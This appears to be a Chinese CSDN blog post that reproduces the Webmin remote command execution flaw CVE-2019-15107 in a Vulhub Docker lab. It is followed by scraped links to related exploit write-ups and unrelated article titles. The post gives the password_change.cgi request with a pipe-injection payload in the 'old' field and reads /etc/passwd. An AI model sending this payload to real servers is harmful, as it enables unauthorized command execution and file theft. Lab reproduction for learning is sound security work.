今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-15107 webadmin RCE漏洞复现。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、CVE-2019-15107 webmin RCE漏洞简介与环境搭建

CVE-2019-15107漏洞是webmin系统存在的RCE漏洞编号。webmin是一个用于Unix系统管理的Web页面,通过webmin,用户可以使用Web浏览器来管理系统的各项设置。
为了复现CVE-2019-15107漏洞,我们首先需要搭建漏洞环境。我们使用Vulhub来搭建漏洞环境,安装完Vulhub后,进入如下所示的目录(目录根据不同的安装而不同):

执行命令:

docker-compose up -d

可以远程下载该漏洞Docker虚拟环境,并且创建一个环境。该命令执行结果如下所示:

之后,我们执行命令:

docker-compose config

即可查看该Docker虚拟环境,该命令执行结果如下所示:

这样,我们就可以使用浏览器访问该漏洞环境了,访问结果如下所示:

二、CVE-2019-15107 webmin RCE实战

接下来,我们就需要进行CVE-2019-15107 webmin 的RCE漏洞实战了。我们在该页面中随便抓一个数据包如下所示:

接下来,我们将该数据包的第一行更换为如下内容:

POST /password_change.cgi HTTP/1.1

接下来,我们将该数据包的最后一行更换为如下内容:

user=rootxx&pam=&expired=2&old=test|【放入要执行的命令】&new1=test2&new2=test2

然后发送数据包后,可以看到在数据包的回显中,出现了我们插入的cat /etc/passwd命令的结果,相关结果如下所示:

从上图中可以看出,CVE-2019-15107 webmin RCE漏洞复现成功!
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

CVE-2019-15107 webmin RCE漏洞复现相关推荐

  1. 用友php漏洞,用友GRP-u8 注入-RCE漏洞复现

    用友GRP-u8 注入-RCE漏洞复现 (HW第一时间复现了,当时觉得不合适,现在才发出来) 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导 ...

  2. x友GRP-u8 注入-RCE漏洞复现

    用友GRP-u8 注入-RCE漏洞复现 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件. 二.漏洞复现 SQL注入POC ...

  3. thinkphp 5.0.23 rce漏洞复现

    thinkphp 5.0.23 rce漏洞复现 thinkphp介绍 thinkphp是一个快速.兼容而且简单的轻量级国产php开发框架,支持windows/Unix/linux等服务器环境,并且有相 ...

  4. 禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记

    禅道全版本rce漏洞复现笔记 漏洞说明 禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理.项目管理.测试管理于一体,同时还包含了事务管理.组织管理等诸多功能,是中小 ...

  5. 通达+oa+php+文件+乱,通达OA任意文件删除/OA未授权访问+任意文件上传RCE漏洞复现...

    0x00 简介 通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠.数据存取集中控制,避免了数据泄漏的可能.提供数据备份工具,保护系统数据安全.多级 ...

  6. SamSung WLAN AP:RCE漏洞复现

    SamSung WLAN AP:RCE 一:漏洞信息 三星WLAN AP WEA453E路由器远程命令执行- 二:漏洞复现Fofa语法: Fofa语法: title=="Samsung WL ...

  7. (2022年12月最新)SpringBoot远程代码执行whitelabel error page SpEL RCE漏洞复现

    1. 漏洞原理 spring boot 处理参数值出错,流程进入org.springframework.util.PropertyPlaceholderHelper 类中 此时 URL 中的参数值会用 ...

  8. 禅道项目管理系统RCE漏洞复现+利用

    1.漏洞概述 禅道研发项目管理软件是国产的开源项目管理软件,专注研发项目管理,内置需求管理.任务管理.bug管理.缺陷管理.用例管理.计划发布等功能,实现了软件的完整生命周期管理.2023年1月6日, ...

  9. JumpServer RCE漏洞复现

    本文主要复现2021年1月出现的JumpSever的RCE漏洞 1.漏洞范围 JumpServer < v2.6.2 JumpServer < v2.5.4 JumpServer < ...

最新文章

  1. MediaCodeC解码视频指定帧,迅捷、精确
  2. 云网融合 — 基于 SD-DCI 的云间网络融合
  3. 【Java 虚拟机原理】垃圾回收算法 ( 标记-清除算法 | 复制算法 | 标记-整理算法 )
  4. python列表生成字典_Python 列表生成式 字典生成式
  5. [转]COM线程模型-套间
  6. 使用vue-CLI构建vue工程项目
  7. 看完Java的动态代理技术——Pythoner笑了
  8. exif_imagetype() 函数在linux下的php中不存在
  9. Winform程序多种语言切换
  10. 用python写生日快乐说说_生日快乐的说说(精选50句)
  11. MF前传——探索者一号液晶屏接线
  12. 链家二手房成交数据分析(采用pytorch环境)
  13. 用Tkinter打造GUI开发工具(35)Tkinter中的视频播放组件
  14. 软件测试 技术类面试题问题集锦
  15. 51单片机LCD1602电子时钟
  16. 空间分辨率和灰度分辨率
  17. MacOS 11 系统电子书方案----MuMu安卓模拟器
  18. Arduino 下用A4988或TMC2209驱动42步进电机
  19. PART 1/“物网(物联网)”的差异化需求
  20. javascript 解 一笔画游戏

热门文章

  1. 图文并茂解释Transformer--The Illustrated Transformer翻译精简
  2. python:使用xlrd、pandas、numpy做MK趋势分析
  3. 计算各个数字出现的次数
  4. fluent user guide DPM学习
  5. Dia Diagram Editor一款多平台开源流程图软件介绍
  6. system3之:2 DHCP服务
  7. java lunar_JAVA工具例大全--获得中国农历及润月月份
  8. 抖音引流微信11种方法
  9. [0895]《动物传染病学》
  10. win7无法安装Microsoft .NET Framework 4.0 成功解决